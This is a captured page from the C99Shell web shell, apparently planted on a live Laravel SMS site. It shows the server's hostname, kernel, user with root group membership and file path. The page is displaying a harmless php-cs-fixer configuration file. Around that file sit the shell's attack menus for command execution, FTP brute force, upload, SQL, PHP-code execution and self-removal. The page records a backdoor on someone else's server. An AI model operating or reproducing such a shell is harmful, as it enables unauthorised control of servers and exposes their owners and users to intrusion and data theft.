!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/vendor/barryvdh/laravel-ide-helper/   drwxr-xr-x
Free 28.54 GB of 117.98 GB (24.19%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     .php-cs-fixer.common.php (1.65 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

// Share common rules between non-test and test files
return [
    
'@PSR12' => true,
    
'blank_line_after_opening_tag' => true,
    
'braces' => [
        
'allow_single_line_anonymous_class_with_empty_body' => true,
    ],
    
'compact_nullable_typehint' => true,
    
'declare_equal_normalize' => true,
    
'lowercase_cast' => true,
    
'lowercase_static_reference' => true,
    
'new_with_braces' => true,
    
'no_blank_lines_after_class_opening' => true,
    
'no_leading_import_slash' => true,
    
'no_whitespace_in_blank_line' => true,
    
'ordered_class_elements' => [
        
'order' => [
            
'use_trait',
        ],
    ],
    
'ordered_imports' => [
        
'imports_order' => [
            
'class',
            
'function',
            
'const',
        ],
        
'sort_algorithm' => 'alpha',
    ],
    
'return_type_declaration' => true,
    
'short_scalar_cast' => true,
    
'single_trait_insert_per_statement' => true,
    
'ternary_operator_spaces' => true,
    
'visibility_required' => [
        
'elements' => [
            
'const',
            
'method',
            
'property',
        ],
    ],

    
// Further quality-of-life improvements
    
'array_syntax' => [
        
'syntax' => 'short',
    ],
    
'concat_space' => [
        
'spacing' => 'one',
    ],
    
'fully_qualified_strict_types' => true,
    
'native_function_invocation' => [
        
'include' => [],
        
'strict' => true,
    ],
    
'no_unused_imports' => true,
    
'single_quote' => true,
    
'space_after_semicolon' => true,
    
'trailing_comma_in_multiline' => true,
    
'trim_array_spaces' => true,
    
'unary_operator_spaces' => true,
    
'whitespace_after_comma_in_array' => true,
];

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0037 ]--